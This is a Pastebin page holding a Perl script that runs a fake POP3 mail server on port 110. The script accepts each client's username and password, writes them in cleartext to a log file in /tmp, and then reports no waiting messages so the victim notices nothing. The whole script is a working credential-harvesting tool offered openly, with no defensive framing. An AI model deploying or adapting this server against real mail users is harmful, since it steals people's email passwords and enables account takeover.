Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/perl
- #
- # Fake pop3 server wich just logs user/password into a file and
- # tells that there are no messages waiting.
- #
- # This example daemon was partially on my disk and i have just
- # Modify it to work corretly on this purpose
- #
- # mmo@remote-exploit.org 2003
- $MLEM="\r\n.\r\n";#Multi Line End Marker
- $logfile="/tmp/pop3-captured-passwords.txt";
- use Socket;
- use Fcntl ':flock';
- use IO::Handle;
- use IO::Socket;
- use Carp;
- $door = IO::Socket::INET->new(
- Proto => 'tcp',
- LocalPort => 110,
- Listen => SOMAXCONN,
- Reuse => 1
- );
- die "Cannot set up socket: $!" unless $door;
- $timeout = 60;
- $SIG{ALRM} = sub { die "alarm or timeout\n" };
- sub SockData($){
- my $client = shift;
- my $hersockaddr = getpeername($client);
- my ($port, $iaddr) = unpack_sockaddr_in($hersockaddr);
- my $herhostname = gethostbyaddr($iaddr, AF_INET);
- my $herstraddr = inet_ntoa($iaddr);
- return "$herhostname $herstraddr";
- };
- # from perldoc perlipc:
- sub REAPER {
- $waitedpid = wait;
- print "Reaped $waitedpid and got status [ $? ] \n";
- $SIG{CHLD} = \&REAPER; # still loathe sysV
- }
- $SIG{CHLD} = \&REAPER; # setting it to 'IGNORE' may work: YMMV
- for(;;){
- until( $client = $door->accept()){
- print "Accepted false socket $!";
- sleep 1;
- };
- $F = fork;
- die "Fork weirdness: $!" if $F < 0;
- if($F){
- close $client;
- next;
- };
- # here we are in a new process
- close ($door);
- $client->autoflush();
- print "$$ New Connection ".SockData($client)."\n";
- &AUTHORIZATION;
- print "$$ authorized\n";
- &TRANSACTION;
- print "$$ done\n";
- exit;
- };
- sub OK($){
- my $A = shift;
- $A =~ s/\s+/ /g;
- $A =~ s/\s+\Z//g;
- print $client "+OK $A\r\n";
- print "S: +OK $A\r\n";
- alarm $timeout;
- };
- sub ERR($){
- my $A = shift;
- $A =~ s/\s+/ /g;
- $A =~ s/\s+\Z//g;
- print $client "-ERR $A\r\n";
- print "S: -ERR $A\r\n";
- alarm $timeout;
- };
- sub AUTHORIZATION{
- $cuname='';
- $cpass='';
- $Name = '';
- OK "POP3 Daemon ".SockData($client).scalar(localtime);
- NEEDUSER:
- $Data = <$client>;
- print "C:$Data\n";
- if ($Data =~ m/^quit/i){
- OK "+";
- exit;
- };
- ($Name) = $Data =~ m/^user (\w+)/i;
- unless($Name){
- ERR "-";
- die if ++$strikes > 5;
- goto NEEDUSER;
- };
- OK "User name ($Name) ok. Password, please.";
- $cuname=$Name;
- $Data = <$client>;
- print "C:$Data\n";
- if ($Data =~ m/^quit/i){
- OK "+";
- exit;
- };
- if ($Data =~ m/^pass (.*)/i)
- {
- my $Pass = $1;
- $Pass =~ s/\s+\Z//g;
- open(DATEI,">>$logfile") || die "Could not open $logfile";
- print DATEI scalar(localtime) . " pop3 - user: $cuname password $Pass \n";
- close (DATEI);
- #`echo "pop3 - user: $cuname password: $Pass" >> $logfile`;
- OK "$Name has 0 messages";
- }
- else
- {
- ERR "-";
- die if ++$strikes > 5;
- goto NEEDUSER;
- };
- };
- sub TRANSACTION{
- %deletia = ();
- START:
- $_ = $Data = <$client>;
- unless(defined($Data)){
- print "Client closed connection\n";
- exit;
- };
- print "C:$Data\n";
- if (m/^quit/i){
- OK "Exiting now";
- return;
- };
- if (m/^STAT/i){ &STAT; goto START};
- if (m/^LIST/i){ &NOOP; goto START};
- if (m/^RETR/i){ &NOOP; goto START};
- if (m/^DELE/i){ &NOOP; goto START};
- if (m/^NOOP/i){ &NOOP; goto START};
- if (m/^RSET/i){ &RSET; goto START};
- # optional commands (rfc 1725)
- if (m/^TOP/i){ &NOOP; goto START};
- if (m/^UIDL/i){ &NOOP; goto START};
- ERR "-";
- goto START;
- }
- sub STAT{
- alarm 0; #who knows how long reading the dir will take?
- $mm = 0;
- $nn = 0;
- OK "$nn $mm";
- };
- sub NOOP{
- OK "+";
- };
- sub RSET{
- %deletia=();
- OK "+";
- };
- __END__
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement